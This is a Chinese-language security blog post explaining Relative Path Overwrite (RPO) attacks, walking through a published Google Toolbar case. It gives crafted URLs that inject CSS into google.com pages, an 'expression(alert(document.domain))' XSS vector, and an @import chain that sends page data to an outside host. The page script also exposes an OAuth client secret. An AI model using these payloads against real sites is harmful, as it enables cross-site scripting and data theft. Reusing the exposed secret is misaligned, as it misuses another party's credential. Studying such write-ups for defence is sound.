<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />



  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">






  <meta name="keywords" content="RPO," />










<meta name="description" content="什么是RPORPO(Relative Path Overwrite)相对路径覆盖，是一种利用相对URL路径覆盖目标文件的一种攻击手段。">
<meta name="keywords" content="RPO">
<meta property="og:type" content="article">
<meta property="og:title" content="RPO攻击">
<meta property="og:url" content="http://www.beesfun.com/2017/03/27/RPO攻击/index.html">
<meta property="og:site_name" content="呆萌的技术笔记">
<meta property="og:description" content="什么是RPORPO(Relative Path Overwrite)相对路径覆盖，是一种利用相对URL路径覆盖目标文件的一种攻击手段。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://www.beesfun.com/2017/03/27/RPO攻击/google_toolbar.png">
<meta property="og:image" content="http://www.beesfun.com/2017/03/27/RPO攻击/q_red.png">
<meta property="og:image" content="http://www.beesfun.com/2017/03/27/RPO攻击/RPO_red.png">
<meta property="og:image" content="http://www.beesfun.com/2017/03/27/RPO攻击/rpo-expression-alert.png">
<meta property="og:updated_time" content="2017-08-31T01:14:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="RPO攻击">
<meta name="twitter:description" content="什么是RPORPO(Relative Path Overwrite)相对路径覆盖，是一种利用相对URL路径覆盖目标文件的一种攻击手段。">
<meta name="twitter:image" content="http://www.beesfun.com/2017/03/27/RPO攻击/google_toolbar.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.beesfun.com/2017/03/27/RPO攻击/"/>





  <title>RPO攻击 | 呆萌的技术笔记</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">呆萌的技术笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.beesfun.com/2017/03/27/RPO攻击/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ethan">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://avatars3.githubusercontent.com/u/15061633">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="呆萌的技术笔记">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">RPO攻击</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-03-27T23:51:33+08:00">
                2017-03-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/03/27/RPO攻击/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count gitment-comments-count" data-xid="/2017/03/27/RPO攻击/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="什么是RPO"><a href="#什么是RPO" class="headerlink" title="什么是RPO"></a>什么是RPO</h2><p>RPO(Relative Path Overwrite)相对路径覆盖，是一种利用相对URL路径覆盖目标文件的一种攻击手段。</p>
<a id="more"></a>
<h2 id="google案例"><a href="#google案例" class="headerlink" title="google案例"></a>google案例</h2><p>翻译自<a href="http://blog.innerht.ml/rpo-gadgets/" target="_blank" rel="noopener">http://blog.innerht.ml/rpo-gadgets/</a>.</p>
<h3 id="识别RPO"><a href="#识别RPO" class="headerlink" title="识别RPO"></a>识别RPO</h3><p>RPO依赖于CSS解析器能够解析那些不严谨的语法内容，这是RPO攻击的基础条件，寻找RPO攻击的第一步是检查网页是否按正确的文档类型解析，然后寻找相对CSS样式的导入。</p>
<p>作者发现Google Toolbar的一个目标URL: <code>http://www.google.com/tools/toolbar/buttons/apis/howto_guide.html</code>, 该页面用相对路径导入CSS样式。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span>Google Toolbar API - Guide to Making Custom Buttons<span class="tag">&lt;/<span class="name">title</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;<span class="name">link</span> <span class="attr">href</span>=<span class="string">"../../styles.css"</span> <span class="attr">rel</span>=<span class="string">"stylesheet"</span> <span class="attr">type</span>=<span class="string">"text/css"</span> /&gt;</span></span><br></pre></td></tr></table></figure>
<p>下一步是找出目标服务器解析路径的方式。对浏览器来说，目录是通过 <code>/</code> 来分隔的，然而对服务器来说，路径中包含 <code>/</code>并不意味着存在一个目录。例如，JSP接收路径参数是以<code>;</code>作为分隔符的，例如<code>http://example.com/path;/notpath</code>，而浏览器并不识别这种模式，而当做是存在目录的路径。</p>
<p>同样，Google Toolbar也有它自己独特的解析路径的方式。在发送请求给服务器之前，会对请求进行处理并解码所有的路径，但是谷歌浏览器并不会强制转换<code>%2f</code>为<code>/</code>,因此可以将路径中的<code>/</code>替换为<code>%2f</code>。访问<code>http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html</code></p>
<img src="/2017/03/27/RPO攻击/google_toolbar.png">
<p>针对上面的链接，服务器和浏览器对路径的解析是不一致的.</p>
<ul>
<li>服务器视角: <code>/tools/toolbar/buttons/apis/</code> + howto_guide.html</li>
<li>浏览器视角: <code>/tools/toolbar/buttons/</code> + apis%2fhowto_guide.html</li>
<li>导入的css样式: <code>/tools/</code> + <del>toolbar/buttons/../../</del>style.css</li>
</ul>
<p>以上”+”左边高亮部分表示基本路径，浏览器认为基本路径是 <code>/tools/toolbar/buttons/</code> 而不是 <code>/tools/toolbar/buttons/apis/</code>, 因此导入相对路径的样式<code>../../style.css</code> 会额外多跳一层目录路径，本应该导入css的路径为”tools/toolbar/style.css”, 而现在为”tools/style.xss”。</p>
<p>除了跳目录以外，还能制作假目录，例如，我们想在导入的样式路径为<code>/tools/fake/styles.css</code>, 可以构造如下url:<code>http://www.google.com/tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html</code></p>
<ul>
<li>服务器视角: /tools/<del>fake/../</del>toolbar/buttons/apis/ + howto_guide.html</li>
<li>浏览器视角: tools/fake/..%2ftoolbar/buttons/ + apis%2fhowto_guide.html</li>
<li>导入的css样式: /tools/fake/<del>..%2ftoolbar/buttons/../../</del> + style.css</li>
</ul>
<p>这里我们添加了两个虚假的路径:<code>fake/</code>和<code>..%2f</code>, 以便他们能在服务器相互抵消，同时浏览器认为<code>fake/</code>是一个真实的目录，并且，<code>..%2ftoobar</code>是另外一个目录。理论上，我们可以再根路径上导入任何样式，通过<code>https://www.google.com/*/styles.css</code>, 然而不幸的是代理只在<code>https://www.google.com/tools/*/styles.css</code>路径上有效，换句话说，任何在<code>/tools/</code>路径之外的路径采用编码魔术(<code>%2f</code>代替<code>/</code>)将不起作用, 也就是说，只能在<code>https://www.google.com/tools/*/styles.css.</code>导入任何样式。</p>
<p>我试图四处寻找，发现任何url都是静态的，除了,<br><code>http://www.google.com/tools/toolbar/buttons/gallery</code>会重定向到<code>http://www.google.com/gadgets/directory?synd=toolbar&amp;frontpage=1</code>。现在事情变得有趣了，参数<code>q</code>是作为搜索参数，并且反应在页面上，让我们注入一个简单的payload:<code>http://www.google.com/gadgets/directory?synd=toolbar&amp;frontpage=1&amp;q=%0a{}*{background:red}</code></p>
<img src="/2017/03/27/RPO攻击/q_red.png">
<p>这非常棒，只要我们能通过某种方式导入样式参数<code>q</code>. 最后一步是找出如何在我们引用它作为样式的同时，维持查询字符串。RPO需要持续的注入,因为导入样式表并不包含查询字符串本身。但是由于路径解码的行为，我们能使用如下payload导入样式。</p>
<p><code>http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D/..%2f/apis/howto_guide.html</code></p>
<ul>
<li>服务器视角: /tools/toolbar/buttons/<del>gallery?q=%0a{}*{background:red}/../</del>/apis/ + howto_guide.html</li>
<li>浏览器视角: /tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D/..%2f/apis/ + howto_guide.html</li>
<li><p>导入的css样式:</p>
<ul>
<li>/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D/<del>..%2f/apis/../../</del>style.css</li>
<li>/tools/toolbar/buttons/gallery?q=%0a{}*{background:red}/style.css</li>
<li>/gadgets/directory?synd=toolbar&amp;frontpage=1&amp;q=%0a{}*{background:red}/style.css</li>
</ul>
</li>
</ul>
<img src="/2017/03/27/RPO攻击/RPO_red.png">
<p>我们还能做得更好么？当然，我们改变payload为 CSS XSS向量<code>expression(alert(document.domain))</code>，并启动IE8: <code>http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bx%253Aexpression(alert(document.domain))%257D/..%2f/apis/</code></p>
<img src="/2017/03/27/RPO攻击/rpo-expression-alert.png">
<h3 id="使用RPO加载其他页面"><a href="#使用RPO加载其他页面" class="headerlink" title="使用RPO加载其他页面"></a>使用RPO加载其他页面</h3><p>我们可以使用RPO去偷其他页面的数据。CSS有一个有意思的地方，在怪异模式下，松散解析适用于所有导入的样式表，只要他们同源，这开辟了一个新的可能，如果导入的样式表包含机密数据和注入点，我们就能通过CSS魔法偷走他们。但这样的页面有最低要求如下：</p>
<ul>
<li>注入点在机密数据之前出现</li>
<li>注入点允许<code>%0a</code>, <code>%0c</code> 或 <code>%0d</code>，以便于解析器的状态可以从一个错误的状态中恢复过来</li>
<li>机密数据和它周围不能包含换行符</li>
</ul>
<p><code>http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D%2540import%2527%252Fsearch%253Fnord%253D1%2526q%253D%257B%257D%25250a%2540import%252527%252F%252Finnerht.ml%253F%2522/..%2f/apis/howto_guide.html</code></p>

<h2 id="RPO-利用原理和条件"><a href="#RPO-利用原理和条件" class="headerlink" title="RPO 利用原理和条件"></a>RPO 利用原理和条件</h2><ul>
<li>相对路径导入css样式</li>
<li>浏览器解析路径和服务器不一致，浏览器将服务器返回的不是css的文件当做CSS文件解析</li>
<li>CSS解析器忽略非法的内容</li>
</ul>
<h3 id="CSS解析器"><a href="#CSS解析器" class="headerlink" title="CSS解析器"></a>CSS解析器</h3><p>CSS2 规范中指出，”在某些情况下，用户代理必须忽略非法样式的一部分”，规范定义忽略意味着解析非法部分(为了找到它开始和结束的地方), 同时又当它不存在。规范其他地方又补充到，“对于混合CSS内容和其他内容的文件，CSS会忽略非法的内容”。</p>
<p>那么，我们可以通过植入CSS代码，欺骗CSS解析器去忽略之前的不合法的语法内容，从而加载我们植入的CSS代码，最好的方法是选择一个无效的“选择器”，css会忽略之前所有的非法内容。</p>
<p>如下有两种利用选择器去忽略非法内容的方式，原理是CSS解析器解析<code>}</code>或<code>{}</code>都将工作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#125;*&#123;color:#ccc;&#125;</span><br><span class="line">&#123;&#125;&#125;*&#123;color:#ccc;&#125;</span><br></pre></td></tr></table></figure>
<h2 id="Refer"><a href="#Refer" class="headerlink" title="Refer"></a>Refer</h2><ul>
<li><a href="http://edu.aqniu.com/article/65" target="_blank" rel="noopener">http://edu.aqniu.com/article/65</a></li>
<li><a href="http://www.thespanner.co.uk/2014/03/21/rpo/" target="_blank" rel="noopener">http://www.thespanner.co.uk/2014/03/21/rpo/</a></li>
<li><a href="http://blog.innerht.ml/rpo-gadgets/" target="_blank" rel="noopener">http://blog.innerht.ml/rpo-gadgets/</a></li>
<li><a href="http://blog.portswigger.net/2015/02/prssi.html" target="_blank" rel="noopener">http://blog.portswigger.net/2015/02/prssi.html</a></li>
</ul>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Ethan
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://www.beesfun.com/2017/03/27/RPO攻击/" title="RPO攻击">http://www.beesfun.com/2017/03/27/RPO攻击/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/RPO/" rel="tag"># RPO</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/03/26/跨域/" rel="next" title="跨域">
                <i class="fa fa-chevron-left"></i> 跨域
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/03/28/MySQL注入系列之二次注入-三/" rel="prev" title="MySQL注入系列之二次注入(三)">
                MySQL注入系列之二次注入(三) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://avatars3.githubusercontent.com/u/15061633"
                alt="Ethan" />
            
              <p class="site-author-name" itemprop="name">Ethan</p>
              <p class="site-description motion-element" itemprop="description">personal blog :)</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">52</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">56</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/hxer/" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://badcode.cc/" title="badcode" target="_blank">badcode</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.wupco.cn" title="wupco" target="_blank">wupco</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://danaive.github.io" title="danlei" target="_blank">danlei</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是RPO"><span class="nav-number">1.</span> <span class="nav-text">什么是RPO</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#google案例"><span class="nav-number">2.</span> <span class="nav-text">google案例</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#识别RPO"><span class="nav-number">2.1.</span> <span class="nav-text">识别RPO</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用RPO加载其他页面"><span class="nav-number">2.2.</span> <span class="nav-text">使用RPO加载其他页面</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RPO-利用原理和条件"><span class="nav-number">3.</span> <span class="nav-text">RPO 利用原理和条件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CSS解析器"><span class="nav-number">3.1.</span> <span class="nav-text">CSS解析器</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Refer"><span class="nav-number">4.</span> <span class="nav-text">Refer</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ethan <a href="http://www.miitbeian.gov.cn">渝ICP备18007542号</a></span>
  
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        




  <script type="text/javascript">
    (function() {
      var hm = document.createElement("script");
      hm.src = "//tajs.qq.com/stats?sId=63078337";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitmint({
            id: '1490629893000', 
            owner: 'hxer',
            repo: 'blogComment',
            
            lang: "zh-Hans" || navigator.language || navigator.systemLanguage || navigator.userLanguage,
            
            oauth: {
            
            
                client_secret: '7147116f4ae9df31961313af13fad164bdbf0fe3',
            
                client_id: 'ac1236f9efefa7d5580f'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  

  

  
  

  

  

  

</body>
</html>
